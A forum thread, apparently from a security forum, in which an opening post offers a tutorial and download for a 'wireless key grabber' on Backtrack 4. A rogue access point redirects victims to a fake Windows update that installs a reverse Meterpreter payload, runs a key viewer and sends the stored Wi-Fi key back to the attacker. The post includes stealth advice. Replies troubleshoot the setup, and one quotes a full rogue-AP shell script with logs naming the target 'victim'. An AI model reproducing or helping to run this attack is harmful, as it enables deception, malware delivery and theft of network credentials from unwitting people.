Page 1 of 5
Results 1 to 10 of 44

Thread: Wireless key grabber - Backtrack 4

  1. #1
    Join Date
    Feb 2010


    I have simplified my previous tutorial on grabbing wireless keys, specially set up for Backtrack 4.

    Here is the intro:

    This is a simplified tutorial for grabbing wireless keys from our victim, regardless of their wireless security. The theory is we create a fake access point, our victim connects, tries to surf the internet but gets redirected to our fake update page. The victim then downloads our “windows update”, which is a reverse meterpreter exe. Metasploit then runs its script, uploads wireless key viewer, executes it on the victim's computer, creates a randomly titled text file containing the PC's wireless key, and uploads it back to Backtrack.

    Crippled features:
    Reverse meterpreter port set to 5555; to be stealthy we should choose another port.
    Windows update html (index.html) is a very simplified page; to be stealthy you need to redesign it.
    rar file here

    readme at

    cr1spyj0nes --- is this what you needed?

    I'm sure we can automate the remainder.

    Edit: lots of views but no comments? Does it work?

  2. #2
    Junior Member
    Join Date
    Oct 2008


    I will try it out but before that I need also to get your Fake AP project running.

    Then I will understand this much more easily!

    By the way have a look in my thread I need some help over getting it to work.

    Do I have to disable the DHCP service on my router? This might be one of the reasons why it didn't work.

    Check it and let me know!

    Thank you!

  3. #3
    Just burned his ISO
    Join Date
    Mar 2009

    Wireless key grabber - Backtrack 4

    Thanks a lot for all your tutorials so far.

    I tried your method in BT4 with partial success. The first issue I had was with the dhcp server. The client was connected but unable to obtain a valid IP. After some investigation it appeared to be an issue with the user groups of the dhcpd.

    When I issued this command: # dhcpd3 -cf /etc/dhcpd3/dhcpd.conf at0
    It returned an error: Cannot create an entry /var/run/ -- Permission denied.

    To mitigate this I followed:
    #vim /var/run/
    #chgrp dhcpd /var/run/
    #chown dhcpd /var/run/
    Then I restarted the dhcp server and connected clients were able to get valid IPs.

    The next issue I had was obtaining the key.
    Once I was connected to the fake IP, I downloaded and installed the file; however, I was not able to receive the txt file with the WPA key. On the metasploit terminal it was stuck for ages on: Uploading key.... (or something like that)

    Any suggestions?



  4. #4
    Join Date
    Feb 2010


    Are you sure you are using my wireless key grabber for Backtrack 4 and not Backtrack 3?

    I see you have issued

    dhcpd3 -cf /etc/dhcpd3/dhcpd.conf at0

    whereas you should have issued

    /etc/init.d/dhcp3-server restart

    If you are following the old tutorial then it may not work; follow this one and it should be fine.

    Can a mod merge these threads, please?

  5. #5
    Just burned his ISO
    Join Date
    Mar 2009


    I definitely used the correct grabber.

    As I explained, I had an issue with the dhcp not issuing IPs once connected. By trying to restart the dhcp server with this command "/etc/init.d/dhcp3-server restart" it was displaying a "fail" error message. Hence my workaround to bypass this issue, which worked a treat.

    However, my issue was with the keygrabber not uploading back the key.
    From the connected client I telnet back to my BT4 on port 5555 to see if a connection is established. As soon as I connected to the port I could see all the registry values being transferred, and on the metasploit terminal a message appeared as "upload success"; however, no txt file was present on the BT4.

    Hmmm, I'm a bit puzzled.... I'll give it another go with a different laptop.
    (Please note that the laptop I tried it on had limited privileges, so I don't know if this poses any limitations.....)

    I cannot post yet in the wireless section, thus my new thread in this section...

  6. #6
    Join Date
    Feb 2010


    Ah, I see, didn't realise that you couldn't post in the wireless section.

    Looks like you almost got it to work: wkv uploaded and executed on the victim's computer, just the key text file not downloaded.

    Open up the harvester.rb file and look at the coding in there; maybe you just need to amend the destination of the text file.

    I can explain each line to you if you get stuck.

  7. #7
    Junior Member
    Join Date
    Apr 2008


    hm2075, please can you upload the rar file and readme file somewhere else rather than megaupload?

  8. #8
    Join Date
    Feb 2010


    Any suggestions?

  9. #9
    Moderator theprez98
    Join Date
    Jan 2010


    Threads merged

  10. #10
    Good friend of the forums williamc
    Join Date
    Feb 2010
    Chico CA


    I'm trying to work through your tutorial. I'm running Backtrack 3, so I know some of the prerequisites will install and behave differently. With that said, can you perhaps help me troubleshoot my configuration?
    Attack PC:
    RTL8187L USB adapter

    MS Vista
    Intel 4965AGN

    Things work up to the victim receiving an IP. What I can't seem to figure out is why traffic is not forwarding through the attacker eth0. Once that is addressed, I can move on to getting lighttpd working on BT3.

    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/`
    killall -9 dhcpd airbase-ng ettercap
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun
    konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
    sleep 10
    ifconfig at0 up
    ifconfig at0 netmask
    ifconfig at0 mtu 1400
    route add -net netmask gw
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j MASQUERADE
    iptables -P FORWARD ACCEPT
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j MASQUERADE
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    echo > '/var/state/dhcp/dhcpd.leases'
    konsole -e dhcpd -d -f -cf /etc/dhcpd.conf at0 &
    konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward

    3:41:24  Got broadcast probe request from 00:18:DE:3C:FB:BF
    13:41:24  Got broadcast probe request from 00:1D:E0:4F:B0:07
    13:41:25  Got directed probe request from 00:1F:3B:00:F2:51 - "test1234"
    13:41:25  Got an auth request from 00:1F:3B:00:F2:51 (open system)
    13:41:25  Client 00:1F:3B:00:F2:51 associated (unencrypted) to ESSID: "test1234"
    13:41:25  Got broadcast probe request from 00:18:DE:69:47:CD

    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    Listening on at0... (Ethernet)
       at0 ->       00:C0:CA:19:A0:8C
    SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
    Privileges dropped to UID 65534 GID 65534...
    DHCP: [00:1F:3B:00:F2:51] DISCOVER
    DHCP: [00:1F:3B:00:F2:51] REQUEST
    DHCP: [] ACK : GW DNS

    Listening on LPF/at0/00:c0:ca:19:a0:8c/10.0.0/24
    Sending on   LPF/at0/00:c0:ca:19:a0:8c/10.0.0/24
    Sending on   Socket/fallback/fallback-net
    DHCPDISCOVER from 00:1f:3b:00:f2:51 via at0
    DHCPOFFER on to 00:1f:3b:00:f2:51 (victim) via at0
    DHCPREQUEST for ( from 00:1f:3b:00:f2:51 (victim) via at0
    DHCPACK on to 00:1f:3b:00:f2:51 (victim) via at0
    DHCPINFORM from via at0
